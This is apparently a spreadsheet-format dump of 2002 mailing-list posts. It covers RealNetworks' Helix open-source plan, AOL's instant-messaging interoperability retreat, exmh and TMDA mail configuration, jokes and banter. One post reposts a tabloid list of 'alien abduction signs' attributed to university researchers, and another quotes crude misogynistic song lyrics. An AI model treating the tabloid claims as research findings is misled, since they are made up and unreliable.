advantage of the original programmers' instructions.RealNetworks is to announce a range of partners, including Hitachi,
Hewlett-Packard, I.B.M., Deutsche Telekom, NEC, Nokia, Cisco Systems,
Oracle, Sun Microsystems, Palm, Texas Instruments and others. These
partners could then incorporate the software into their own hardware and
software products.Under the licensing strategy, companies will be able to freely gain
access to the underlying code that the Helix program is based on, but
they will still pay a licensing fee when they sell commercial products
based on the technology.The community-source approach to software, which was pioneered by Sun to
distribute its Java programming language, is a variation upon the
original free software or open-source approach which has confounded the
software industry in recent years.While open-source software can be freely shared, with some restrictions,
the community-source approach is more restrictive and yet still tries to
persuade others to collaborate and add innovative ideas.Other large technology companies including Sun, I.B.M. and Apple, have
all now adopted variations on such open-source strategy, with varying
results. In Sun's case, the company has been criticized because, while
Java has become an industry standard, the company has not been the
principal financial beneficiary in many cases.RealNetworks is trying to strike a balance between opening up its
technology to persuade others to participate and innovate and not losing
control of the technology entirely, Mr. Glaser said. "We think we've
struck the balance well," he said.Analysts said the strategy shift by RealNetworks was likely to shake up
the industry. "The moment you've open-sourced something you've cornered
your competitor," said Matthew Berk, an analyst a Jupiter Research. "To
date this stuff has been very proprietary. Opening it up makes it
accessible to creative and gifted programmers who will come up with wild
stuff that the companies have never considered."Mr. Glaser said he expected other companies to produce technology that
would rival RealNetworks' commercially as a result of the
community-source strategy.One possibility is that companies such as Sun or I.B.M. could decide to
add the Helix technology of RealNetworks as a standard component of
their operating systems. Although RealNetworks might not get a
significant financial benefit from such an arrangement it could
contribute to making its Helix software a de facto industry standard.Mr. Glaser said he had struck upon the idea of making his media server
software open source while visiting with an executive from Nokia, the
world's largest cellphone maker."Taking all of this stuff beyond the PC has been a huge motivation for
us," he said. When he realized that Nokia was interested in deploying
the software technology on as many as 30 to 40 different types of
phones, he realized that RealNetworks did not have enough programming
talent to support the effort."I told him, `I don't think we have enough engineers even if you guys
were willing to pay us,' " he said.That touched off a search for an alternative way of having the two
companies cooperate.http://quicken.com.com/2100-1023-945406.htmlReal takes the open-source route 
By Jim Hu 
Staff Writer, CNET News.com
July 22, 2002, 1:55 PM PTRealNetworks on Monday unveiled a new open-source version of its
streaming media technology that supports multiple file formats for audio
and video, including those that use Microsoft's Windows Media technology. The new campaign, dubbed "Helix," and first reported by The New York
Times, marks one of the most ambitious moves in the company's
history. RealNetworks is simultaneously releasing technology without
permission that plugs in to Microsoft's competing software and is
raising the hood on much of its own software technology to "open source"
developers or anyone else who wants to look. The twin moves raise the risk of lawsuits and renewed competition --
potentially even from Redmond, Wash.-based Microsoft itself, once it
gets a look under the hood at RealNetworks' technology. But it marks a
dramatic, potential way for a company watching its market share diminish
to regain momentum and support across an industry where many other
players remain skeptical of Microsoft's power."It's a very bold move on the part of Real," said Michael Gartenberg, a
research director for analyst firm Jupiter Research. "This was a shot
fired by Real and fired directly at Redmond." The move is the latest in a series of strategic twists and turns that
has made RealNetworks one of the only companies to survive direct
Microsoft competition for years. While the company has expanded into
paid subscription content business, its software and streaming media
infrastructures have been under increasing pressure from Microsoft,
which has deemed multimedia to be one of the major drives under the
latest versions of its Windows operating system. Real's Helix announcement mainly involves the technology that allows
media files to move from place to place over the Internet. RealNetworks
and Microsoft both produce servers that allow video and audio to be
streamed from a content company such as CNN or NBC to a personal
computer. Real has charged for this software, while Microsoft has given
it away for free. In April, RealMedia reached 17 million at-home viewers, compared with
Windows Media at 15.1 million and Apple Computer's QuickTime at 7.3
million, according to Nielsen/NetRatings. At work, Windows Media drew
about 12.2 million unique viewers, compared with RealMedia's 11.6
million and QuickTime's 5 million. Real's own new product, called the Universal Server, will allow one
server to stream Real's technology, Microsoft files, Apple Computer's
QuickTime, and others. Most other competing products do not support
competitors' technology. "When you have all these different platforms, and all these different
protocols, it gets unmanageable," RealNetworks' Rob Glaser said at a
high-glitz press conference in San Francisco announcing the product. "A
lot of what (this technology) is about is breaking those bottlenecks and
making convergence really converge." To make the new product compatible with Microsoft files, however, the
company pursued a risky strategy known as "reverse engineering," in
which developers examine a competitor's product to see how it works and
try to create something that works just like it. Glaser said that engineers worked entirely in a "clean room"
environment, meaning that they had no access to actual Microsoft
code. Had they simply copied code, they could be liable for patent
infringement. The resulting product simply mimics the way that
Microsoft's files are sent across networks and allows a Windows Media
player to receive the file. Other companies have been sued for simply copying a competitor's code
and putting it in their own products. But RealNetworks says it's not
worried about Microsoft lawsuits, because it took precautions to do all
development in the "clean room" environment. Microsoft itself has
engaged in this kind of legal reverse engineering. Analysts say Microsoft, which still faces antitrust lawsuits, is in no
position to sue in any case. "This is a very tenuous time for Microsoft," Gartenberg said. "This is
not a time in Microsoft's history when it can be seen as trying to do to
Real what it did to Netscape." The influential giant?Certainly, Monday's announcement acknowledges Microsoft's influence in
media technology, something Glaser and Real have often been loathe to do. Microsoft was quick to spin Monday's announcement as further validation
of its strength in the marketplace. "It's an admission of RealNetworks that it's important for them to
support Windows Media and that we're now the leading player among home
and work users," said Michael Aldridge, lead product manager for
Microsoft's Windows Digital Media division. Aldridge added that RealNetworks currently has a licensing agreement for
its media player to support Windows audio and video formats. However,
RealNetworks and Microsoft do not have an agreement to allow the server
to deliver Windows Media formats to end users, which is what
RealNetworks trying to do. Aldridge declined to comment on RealNetworks' replication of Microsoft's
technology. In addition to its own new product, Real has promised to give away
source code to much of the underlying technology for streaming
media. That stops short of the actual file format, or "codec" itself,
but will provide the open-source community and other companies with
powerful new tools to build their own streaming media players or
software. Glaser said he wouldn't initially make the software code that mimics
Microsoft's streaming available but that he was considering the idea. A
first chunk of code underlying the RealNetworks multimedia player
software will be released in 90 days. Other code, including the basic
functions of its streaming media server and encoder, will be released by
the end of the year, the company said. The company's plan to reveal its source code--the basic instructions
underlying the software--echoes similar moves made by Netscape
Communications to defend against Microsoft. In March 1998, Netscape took
the bold step of opening its source code to allow software developers to
help create the next generation of its popular browser. James Barksdale, then CEO of Netscape, said the move would allow the
company to "tap into a virtually unlimited developer talent pool."
Instead, the effort, which has evolved into the Mozilla.org project, hit
considerable roadblocks, and Microsoft overtook Netscape in market
share. ----
aDaM@XeNT.CoM -- .sig double play!
We have done a great job of having teams work around the clock to
deliver security fixes for any problems that arise. Our responsiveness
has been unmatched - but as an industry leader we can and must do
better... Going forward, we must develop technologies and policies that
help businesses better manage ever larger networks of PCs, servers and
other intelligent devices, knowing that their critical business systems
are safe from harm. Systems will have to become self-managing and
inherently resilient. We need to prepare now for the kind of software
that will make this happen, and we must be the kind of company that
people can rely on to deliver it. 
  -- Bill Gates, http://zdnet.com.com/2100-1104-817343.html
The problem with SOAP is that it tries to escape from the Web interface.
It deliberately attempts to suck, mostly because it is deliberately
trying to supplant CGI-like applications rather than Web-like
applications.  It is simply a waste of time for folks to say that "HTTP
allows this because I've seen it used by this common CGI script."  If we
thought that sucky CGI scripts were the basis for good Web
architectures, then we wouldn't have needed a Gateway Interface to
implement them.  In order for SOAP-ng to succeed as a Web protocol, it
needs to start behaving like it is part of the Web.  That means, among
other things, that it should stop trying to encapsulate all sorts of
actions under an object-specific interface.  It needs to limit its
object-specific behavior to those situations in which object-specific
behavior is actually desirable.  If it does not do so, then it is not
using URI as the basis for resource identification, and therefore it is
no more part of the Web than SMTP.
  -- Roy Fielding, http://lists.w3.org/Archives/Public/www-tag/2002Apr/0181.htmlhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; - Joe
&gt; 
&gt; P.S. I hate everybody.one up: I hate everything post-(the first ten seconds of the universe),
but especially everybody and everything, and including but not limited to
puppies and ice cream.
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Lucas Gonze wrote:
&gt;&gt;- Joe
&gt;&gt;
&gt;&gt;P.S. I hate everybody.
&gt; 
&gt; one up: I hate everything post-(the first ten seconds of the universe),
&gt; but especially everybody and everything, and including but not limited to
&gt; puppies and ice cream.
And you. I especially hate you.- Joe
-- 
There is no place in which to hide
Even truth is filled with lies
Doubting angels fall to walk among the living
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002, Adam Rifkin wrote:--]By JOHN MARKOFF
     Ahhh the ahole reporter we all love to sneer at:)---]SAN FRANCISCO, July 21 -- In a significant challenge to Microsoft,
--]RealNetworks plans to announce a new version of its software on Monday
--]that can distribute audio and video in a range of formats, including
--]Microsoft's own proprietary Windows Media.Real is more currupt that MS in so many real ways its astounding Real and
MS CEOS dont felate each other at tech and mass media conferences.Real needs to die and die horribly. Thier biz practices alone give them an
instant berth in the 5th circle of hell. ALl the crap they foist on
systems during installation gets em free passes to all the other circles.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Tom wrote:&gt;On Mon, 22 Jul 2002, Adam Rifkin wrote:
&gt;
&gt;--]By JOHN MARKOFF
&gt;     Ahhh the ahole reporter we all love to sneer at:)-
&gt;
&gt;--]SAN FRANCISCO, July 21 -- In a significant challenge to Microsoft,
&gt;--]RealNetworks plans to announce a new version of its software on Monday
&gt;--]that can distribute audio and video in a range of formats, including
&gt;--]Microsoft's own proprietary Windows Media.
&gt;
&gt;Real is more currupt that MS in so many real ways its astounding Real and
&gt;MS CEOS dont felate each other at tech and mass media conferences.
&gt;
&gt;Real needs to die and die horribly. Thier biz practices alone give them an
&gt;instant berth in the 5th circle of hell. ALl the crap they foist on
&gt;systems during installation gets em free passes to all the other circles.
&gt;
&gt;http://xent.com/mailman/listinfo/fork
&gt;  
&gt;
Well, just to take this thread off topic - does anyone know what's 
involved in serving streaming video? I assume that
 the only practical alternatives are MS and Real, and that it's likely 
to cost some $$$ for the software.
Owen
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; Well, just to take this thread off topic - does anyone know what's
&gt; involved in serving streaming video? I assume that
&gt;  the only practical alternatives are MS and Real, and that it's likely
&gt; to cost some $$$ for the software.A quick Google search turns up:http://developer.apple.com/darwin/projects/streaming/index.html
Darwin streaming media serverhttp://mpeg4ip.sourceforge.net/index.php
MPEG4IP: Open Source, Open Standards, Open StreamingMPEG4IP provides an end-to-end system to explore MPEG-4 multimedia. The
package includes many existing open source packages and the "glue" to
integrate them together. This is a tool for streaming video and audio that
is standards-oriented and free from proprietary protocols and extensions.Provided are an MPEG-4 AAC audio encoder, an MP3 encoder, two MPEG-4 video
encoders, an MP4 file creator and hinter, an IETF standards-based streaming
server, and an MPEG-4 player that can both stream and playback from local
file.Our development is focused on the Linux platform, and has been ported to
Windows, Solaris, FreeBSD, BSD/OS and Mac OS X, but it should be relatively
straight-forward to use on other platforms. Many of the included packages
are multi-platform already.
Both sound interesting, and low $$.- Jimhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Jim Whitehead wrote:
&gt; http://www.research.microsoft.com/~antr/Pastry/download.htmLooks cute. For what it's worth I worked closely with a few
of the people on the team. One was my officemate for years.Unfortunately there's no way I'm loading all the .NET stuff
on my machine. Not yet. And hopefully by the time it's all
stable, I'll be running FreeBSD again on my laptop, and it will
be moot anyway.- Joe
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At 08:58 AM 7/23/02 -0700, Joseph S. Barrera III wrote:&gt;And you. I especially hate you.Heh. The name of the band is SO appropriate...:)http://www.purelyrics.com/index.php?lyrics=foixjtopI, hate the rain and sunny weather
And I, hate the beach and moutains too
(and) I don't like a thing about the city, no, no
And I, I, I, hate the country side too!And I, hate everything about you!
...everything about you!I don't like a thing about your mother
And I, I hate your daddy's guts too
I, don't like a thing about your sister
'cause I, I, I, think sex is overrated too.And I, get sick when I'm around, I, can't stand to be around
I, hate everything about you!everything about you, everything about you, everything about
youSome say I got a bad attitude
But that don't change the way I feel about you
And if you think this might be bringing me down
Look again cause I ain't wearin' no frown!I don't really care about your sister
Fuck the little bitch 'cause I already kissed herOne thing that I did to your lady
Put her on the bed and she didn't say maybe
I know you know everybody knows
The way it comes, the way it's gonna' goYou think it's sad
And that's too bad
'cause I'm havin'
A ball hatin'
Every little thing about you!Everything about you, everything about
I get sick when I'm around
I can't stand to be around
I hate everything about you
-- 
((Udhay Shankar N)) ((udhay @ pobox.com)) ((www.digeratus.com))
      God is silent. Now if we can only get Man to shut up.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Udhay Shankar N wrote:
 &gt; Heh. The name of the band is SO appropriate...:)LOL, literally, actually. :-) &gt; And I, get sick when I'm around, I, can't stand to be around I, hate
 &gt; everything about you!One of my favorite pieces of graffti that I have spotted was at UCI,
and it read:     I am sick when I think of JesusIt has so many meanings, and so many of them are disturbing, especially
to a former good little Catholic boy like me.- Joehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I've picked up these patches and will submit to CVS eventually.
If there are bugs worth fixing, please let me know about the fixes
for them.&gt;&gt;&gt;Mark Scarborough said:
 &gt; 
 &gt; tg@sema.se said:
 &gt; &gt;  mscar  said:
 &gt; &gt;  &gt; My biggest problem with it is that it will _always_ render 
the HTML
 &gt; &gt;  &gt; in messages that are only HTML (possible speed and/or "I 
didn't
 &gt; &gt;  &gt; want to see that porno email" problems). Also, it does away 
with
 &gt; &gt;  &gt; the option to view an HTML part in Netscape. There might be 
times
 &gt; &gt;  &gt; when I want to use a more fully-featured viewer if I 
determine that
 &gt; &gt;  &gt; it's worth the risk.
 &gt; 
 &gt; 
 &gt; &gt; Try these two patches (for exmh-2.5 07/13/2001) I just tossed
 &gt; &gt; together.
 &gt; 
 &gt; &gt; The config option $uri(deferDisplaysInline) probably doesn't 
makes any
 &gt; &gt; sense,  it should probably always be off. But you never know what
 &gt; &gt; people like...
 &gt; 
 &gt; &gt; Anyway, when you get a text/html part and you have defer 
selected, you
 &gt; &gt; can  display it inline by checking the box in the right-button 
menu.
 &gt; 
 &gt; &gt; /Tomas G. 
 &gt; 
 &gt; 
 &gt; Tomas,
 &gt; 
 &gt; This is GREAT!  Thank you!  This is exactly what I was thinking 
about as
 &gt; the "best" solution whether I expressed it well or not.
 &gt; 
 &gt; There are a couple of "coloring" or "highlighting" bugs that I 
haven't had
 &gt; time to fully characterize yet, but I don't care.  We can work out 
the bugs
 &gt; - at least we have the functionality.
 &gt; 
 &gt; Everyone: if you have ever wanted to be able to choose between the 
internal
 &gt; HTML engine and whatever external browser you have defined - on a 
per
 &gt; message basis - give Tomas' patches a try.
 &gt; 
 &gt; Thanks again Tomas.
 &gt; 
 &gt; Mark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</si>
  <si>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Yes - I was going to suggest the folder change hooks as well.
Just have them check for your custom comps file, and generate
or update them if needed.
&gt;&gt;&gt;Hal DeVore said:
 &gt; 
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt; On Fri, 19 Jul 2002, "J" == J C Lawrence wrote:
 &gt; 
 &gt;   J&gt; What would be great is if I could build the relevant comp
 &gt;   J&gt; file dynamically at runtime.
 &gt; 
 &gt; Sure.  Use the "folder change" hooks.  Create a proc named
 &gt; Hook_FolderChangeSomething (where "Something" is meaningful and 
 &gt; likely to be unique in the universe just in case you distribute 
 &gt; this to others).  Put the proc in a file in your ~/.tk/exmh 
 &gt; directory, regenerate the tclIndex, restart exmh.
 &gt; 
 &gt; In that proc you can do anything you want, like rewrite your
 &gt; ~/Mail/comp file.
 &gt; 
 &gt; 
 &gt; --Hal
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt; _______________________________________________
 &gt; Exmh-users mailing list
 &gt; Exmh-users@redhat.com
 &gt; https://listman.redhat.com/mailman/listinfo/exmh-users--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</si>
  <si>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Joseph S. Barrera III wrote:&gt; And you. I especially hate you.BTW, guys, I'm *kidding*! I'm actually in a pretty good mood right now.
I'm not actually a very hateful person, and I certainly can't think of
anyone right now I hate, and certainly not anyone on this list!- Joehttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;From Egg to Drummies: 10 Weeks From Farm to Food
By  Larry Barretthttp://www.baselinemag.com/article2/0,3959,369038,00.aspMy breasts have been halved, breaded and shipped to their current
resting-place on a shelf in a supermarket in Denver. My legs should be
arriving in Moscow any time now. All my feathers have been processed and are
now being eaten by cattle somewhere in Texas. My blood and bones have been
rendered for cat food, fertilizer and who-knows- what else. My wings have
been seasoned with barbecue sauce and served with a side of ranch dressing
and celery at some bar and grill in New York City. My feet? Well, they're
headed to Asia where I'm told they're something of a delicacy.-----------So, a couple of things intrigued me about this byline, and its associated
main article:
And On the 47th Day, This Chicken Went to Market
By  Debbie Gage
http://www.baselinemag.com/article2/0,3959,367672,00.asp- I had no idea how much computer controls played into the raising of
livestock
- I had no idea how fast a chicken is raised these daysIt also strikes me that it will not be very long before livestock is
genetically engineered to be dumber and meatier, and better adapted to
living in industrial conditions.- Jimhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">I suppose the main surprise here is that AOL is coming clean at all. After
all, its long-running game of talking interop, and doing everything possible
to prevent open standards in this arena, seemed to have been working fine,
with most end users completely oblivious to AOL's actions.http://www.quicken.com/investments/news/story/djbn/?story=/news/stories/dj/2
0020723/ON20020723000833.htmAmerica Online Scales Back Instant-Messaging Compatibility Efforts
Updated: Tuesday, July 23, 2002 01:23 PM ETDow Jones NewswiresNEW YORK -- America Online appears to be scaling back efforts to make its
instant-messaging service compatible with rival services.The unit of AOL Time Warner Inc. (AOL, news, msgs) said in a regulatory
filing it is now focusing on messaging interoperability methods that are
more limited in scope than the kind envisioned by the Federal Communications
Commission when it approved the AOL-Time Warner merger in January 2001.America Online isn't required to make its messaging system interoperable
with others, but the FCC's merger approval included what it considered to be
incentives for the company to do so. It also required AOL to file progress
reports on its interoperability efforts every six months. The most recent
report, filed last week, disclosed the company's new direction.The upshot of the strategy shift is that the instant-messaging market isn't
much closer to broad-based interoperability than it was 18 months ago,
according to industry analysts. Unlike e-mail, users of most competing
instant-messaging services still can't directly trade messages. So an
America Online instant- messaging user can't communicate with a user of
Microsoft Corp.'s (MSFT, news, msgs) MSN Messenger, except by using
third-party software such as Trillian.America Online, the biggest instant-messaging provider, has been criticized
for blocking users of rival services from gaining access to its users. The
company also has been accused of dragging its feet amid industry attempts at
interoperability.For its part, America Online has said it wants to protect the security of
its users and the reliability of its system. And it points out that other
companies have so far failed to agree on interoperability standards.When the FCC approved the AOL-Time Warner merger, it said that if America
Online wanted to offer video-conferencing and other advanced
instant-messaging features over Time Warner's cable lines, it first had to
enable its instant- messaging users to communicate with users of rival
services. The intent of the condition was to prevent America Online from
widening its dominance of the instant-messaging market by exploiting its
access to Time Warner cable systems.AOL hasn't yet introduced video features, even though rivals Microsoft and
Yahoo Inc. (YHOO, news, msgs) did so last year.Specifically, the FCC said America Online would have to implement a
technology known as "server-to-server interoperability" before it could
offer video. The technology would allow users of non-America Online services
to detect when AOL users are online, and to trade messages. It would do so
via communications between the computer servers operated by each messaging
provider, using a common language.But in the progress report filed with the FCC last week, America Online said
it will "focus its efforts" on alternatives to server-to-server
interoperability. They are more limited in scope than server-to-sever.As an example of an alternative, America Online cited a recent agreement to
make its instant-messaging service compatible with a new messaging service
from Apple Computer Corp. (AAPL, news, msgs). The Apple service, IChat, will
be included in Mac OS X 10.2, the new Apple operating system set for release
in August.IChat users will be able to talk to America Online users, but it won't
involve server-to-server interoperability. Instead, the actual exchange of
messages will occur only on America Online's servers, even as IChat
customers use Apple software."We believe this kind of hosted IM solution provides, at least in the short
term, a secure, reliable and cost-effective means to provide
interoperability between AOL, IM and unaffiliated IM communities," Steven
Teplitz, AOL's associate general counsel, wrote in the progress report to
the FCC.As to the apparent change in strategy, company spokeswoman Kathy McKiernan
said Tuesday: "It's a recognition that server-to-server has proven a hard
nut to crack for the entire industry." Indeed, users of America Online's
rival services can't directly communicate with each other, either.The alternative solution "was something that we could implement now to
provide for IM communities to communicate," said Ms. McKiernan, adding
America Online would explore partnerships with other messaging providers,
similar to the Apple deal. None has been announced so far.FCC officials couldn't be reached Tuesday.America Online hasn't ruled out the possibility that it would someday
implement server-to-server interoperability. The company has explored the
technology in the past, including a server-to-server last year with Lotus
Development, a unit of International Business Machines Corp. (IBM, news,
msgs).But America Online's interoperability test with Lotus was "limited in scope
and functionality." True server-to-server technology "would require further
significant expenditures of time and resources to develop," wrote Mr.
Teplitz.The Internet Engineering Task Force, a group devoted to developing Internet
standards, has been working on a server-to-server messaging technology but
hasn't yet developed a final version, according to America Online. Task
force representatives couldn't be reached.The company's strategy shift means that true interoperability in instant
messaging is still a couple of years away, according to Michael Gartenberg,
analyst with Jupiter Research."It's still something the market wants," he said. "At some point, it'll
happen, but maybe a couple of years down the road."Mr. Gartenberg and other analysts believe America Online hasn't actively
pursued true interoperability because it wants to protect its large user
base. If messaging systems were compatible, the company could lose ground
because prospective customers might see no difference in choosing another
provider, as long as they can reach America Online users.But partly because of its lack of compatibility and the FCC conditions,
America Online hasn't kept up with rivals in offering new services. MSN and
Yahoo have had video-conferencing via instant-messaging since last year. AOL
has denied that it has held back on video messaging to avoid making its
system interoperable, arguing there is little consumer demand for it.But the new features have paid off for the company's rivals, and they are
catching up. Between last October and April, Microsoft's Messenger user base
rose 32% to 29.1 million, according to ComScore Media Metrix, while Yahoo's
base jumped 19% to 19.2 million users. In the same period, the number of
users of AOL-branded messaging services increased 7% to 54.9 million.
-Peter Loftus; Dow Jones Newswires; 201-938-5267; peter.loftus@dowjones.comCopyright 2002 Dow Jones &amp; Company, Inc.
All Rights Reserved
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 23 Jul 2002, Joseph S. Barrera III wrote:&gt; BTW, guys, I'm *kidding*! I'm actually in a pretty good mood right now.
&gt; I'm not actually a very hateful person, and I certainly can't think of
&gt; anyone right now I hate, and certainly not anyone on this list!You cannot fool us. We know you inside out.P.S. We hate you, too.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugen Leitl wrote:
&gt; P.S. We hate you, too."Fuck you, sir," came the familiar tired chorus."Louder!""FUCK YOU, SIR!"Damn, I love that book (_Forever War_).- Joe
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.research.microsoft.com/~antr/Pastry/download.htmPastry is a generic, scalable and efficient substrate for peer-to-peer
applications. Pastry nodes form a decentralized, self-organizing and
fault-tolerant overlay network within the Internet. Pastry provides
efficient request routing, deterministic object location, and load balancing
in an application-independent manner. Furthermore, Pastry provides
mechanisms that support and facilitate application-specific object
replication, caching, and fault recovery.----You can download a Pastry simulator off of this web site.- Jimhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
In a message dated 7/23/2002 8:45:18 PM, ejw@cse.ucsc.edu writes:&gt;Pastry is a generic, scalable and efficient substrate for peer-to-peer
&gt;applications. Pastry nodes form a decentralized, self-organizing and
&gt;fault-tolerant overlay network within the Internet. Is it made with lard, butter, or vegetable shortenings? 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">At a pub frequented by the members of the EU translator corps,
a Spanish translator and an Irish translator start comparing
notes.  The Spanish translator asks, "Is there anything in Irish
Gaelic which corresponds to 'maÃ±ana'?"  The Irishman thinks for
a moment, fortified by a long pull at his pint, and finally
responds, "Yes -- but it doesn't have the same sense of terrible
urgency."
-- 
#ken	P-)}Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
Author, developer, opinionist      http://Apache-Server.Com/"Millennium hand and shrimp!"
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
Music school jokes --American conductor and European conductor are talking.  European conductor 
says "what a week, I've had 5 rehearsals and a performance."  "That's 
nothing," says the American conductor, "I've had five performances and a 
rehearsal."  What's the difference between a spring in the desert surrounded by palm 
trees and a violist that plays in tune?  A violist that plays in tune is a 
mirage.What's the difference between a rat and a guitar player?  The rat's got 
something to do tonight.Good thing it's not comedy school.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
This thread is starting to rapidly decay ...these are old bits which I cannot explain exactly why I thought they
were important now or why I went rummaging through back folders to
find them or even why I felt compelled by a deep sense of inner
purpose to post them here ...http://www.weeklyworldnews.com/stories/2238.html20 NEW SIGNS THAT YOU WERE ABDUCTED BY SPACE ALIENS!WINSTON-SALEM, N.C. -- You may have been abducted by space aliens --
and not even know it!Psychiatrists, psychologists and UFO experts say millions of people
all over the world have been kidnapped by extraterrestrials. But most
of them can't recall the experience because the memory is so painful
that they've buried it deep in their subconscious minds.But there are strong tip-offs that you may be one of the millions who
have encountered beings from another planet, if you know what to watch
for.Experts at Wake Forest University here, as well as other respected
institutions around the world, offer 20 startling new indicators that
you may have had a close encounter:1. You experience unexplained nausea or a strange sense of uneasiness
around the same time each day.2. You have an unusual new scar or strange mark on your body --
particularly on the roof of your mouth or behind an ear.3. You often find yourself hungry for oranges or lemons -- even after
you've had a large meal or eaten enough food to fill your
stomach. Researchers at Oslo University say this hunger for citrus is
common in alien abductees.4. You have a strong, ever-present feeling that there is some mission
or important thing you're supposed to do in life and you find yourself
constantly driven to achieve it or discover what it might be.5. You often find yourself going through your trash, or the trash of
others, without knowing exactly what you're looking for. Swiss UFO
researchers found that people who have been abducted often find
themselves unaccountably digging through refuse.6. You frequently dream of cattle. Psychologists at the University of
Paris say it's common for the subconscious mind to substitute a cow or
bull for an alien being.7. You feel you're "special" or "chosen."8. You are a vegetarian -- but can't exactly explain why.9. You have an overpowering feeling of dread when you see photos or
drawings of space aliens.10. You are prone to addictive or compulsive behavior. This in itself
is not necessarily indicative of alien abduction. But if there are
other indicators as well, you could be an abductee.11. You wet the bed. Studies in Peru show there's a connection.12. You have frequent insomnia.13. You are strangely intrigued by old western movies. Psychologists
say they can't yet explain abductees' fascination with cowboy movies,
but they say it exists in at least 75 percent of victims.14. Electronic devices often go haywire around you for no discernible
reason.15. You have seen -- or think you've seen -- a mysterious, hooded
figure in or near your home more than once.16. Your fingers are stiff, numb or unresponsive for more than an hour
after you wake up.17. You have had -- or currently have -- severe back or neck problems.18. You frequently experience a ringing in one ear.19. You often get sinusitis or other nasal pain.20. You are frequently haunted by the sense that you're being watched.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt;&gt;&gt;&gt;&gt; On Wed, 24 Jul 2002, "Chris" == Chris Garrigues wrote:  Chris&gt; Am I the only one for whom typing control-L to the main
  Chris&gt; window causes this error?Getting it here too on a copy I haven't updated from CVS since 
about May sometime.--Hal
_______________________________________________
Exmh-workers mailing list
Exmh-workers@redhat.com
https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 21 Jul 2002 16:37:21 -0500 
Hal DeVore  wrote:&gt;&gt;&gt;&gt;&gt;&gt; On Fri, 19 Jul 2002, "J" == J C Lawrence wrote:J&gt; What would be great is if I could build the relevant comp file
J&gt; dynamically at runtime.&gt; Sure.  Use the "folder change" hooks.  Create a proc named
&gt; Hook_FolderChangeSomething (where "Something" is meaningful and likely
&gt; to be unique in the universe just in case you distribute this to
&gt; others).  Put the proc in a file in your ~/.tk/exmh directory,
&gt; regenerate the tclIndex, restart exmh.&gt; In that proc you can do anything you want, like rewrite your
&gt; ~/Mail/comp file.Yeah, that would work, tho there are race conditions and likely/possible
ugly side effects (eg unintentionally left-over comp files).  I've ended
up taking a very different route: TMDA (http://www.tmda.net).  In
particular I use TMDA outbound filters to add custom plus addresses to
the messages I send to specific lists.For example, for the tmda-users list I want a From: address of
claw+tmda@kanga.nu, so the relevant outbound filter is: to tmda-users@libertine.org ext=tmdawhich rewrites my From: header transparently.  When I get next month's
batch of password reminders from Mailman lists I'll be running about
resubscribing to each list either with a standard plus address or a
TMDA-based sender address (ie an address which only the list in question
is able to send mail to).				  -+-Getting TMDA fully happy with nmh was a minor pain.  Reasons:  nmh, like MH, by default delivers outbound mail via SMTP to port 25 on
  a defined host.  The port number cannot be configured (it calls
  getservbyname() which does a lookup against "smtp" in /etc/services).
  Ergo, you are constrained to use tell nmh to use tmda-sendmail instead
  of SMTP.  Using sendmail as the delivery method under MH instead of SMTP is not
  recommended as is loses a number of useful bits of robustness in mail
  delivery failure modes.  Further, when nmh is configured to use
  sendmail instead of SMTP nmh's whom tool calls sendmail as follows:    .../sendmail/ -m -t -i -bv  which creates problems:    Postfix does not support "-bv" and returns in error    Exim does not support "-t" with "-bv" and returns in error    Don't mention Qmail.  I won't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non-standard port to deliver outbound mail to via SMTP.  nmh's
    current insistence on only using port 25 (or as specified in
    /etc/services) is a pain.I've worked out a hack to use TMDA with Exim while retaining nmh's
"whom" support using Exim's system filter:  0) Make sure that the following options are set in ~/.tmda/config:    DATADIR
    ALLOW_MODE_640
    CRYPT_KEY_FILE
    FINGERPRINT  1) chgrp everything in and under ~/.tmda to group "mail".  2) Configure Exim as per the current TMDA HOW-TO.  3) Set the following options in exim.conf:    message_filter = "/etc/exim/filter"
    message_filter_pipe_transport = address_pipe  4) /etc/exim/filter reads:    # Exim filter
    testprint "local_part: ${local_part: $h_From:}"
    testprint "domain: ${domain: $h_From:}"
    if "$h_X-tmda-fingerprint:" is "" and 
       "${domain: $h_From:}" is "kanga.nu" and
       "${if exists {/home/${local_part:$h_From:}/.tmda} {true}{false}}" is "true"
    then
      pipe "/usr/bin/tmda-inject -c /home/${local_part:$h_From:}/.tmda/config"
      finish
    endif  Yes, that assumes that all user directories are under /home and that
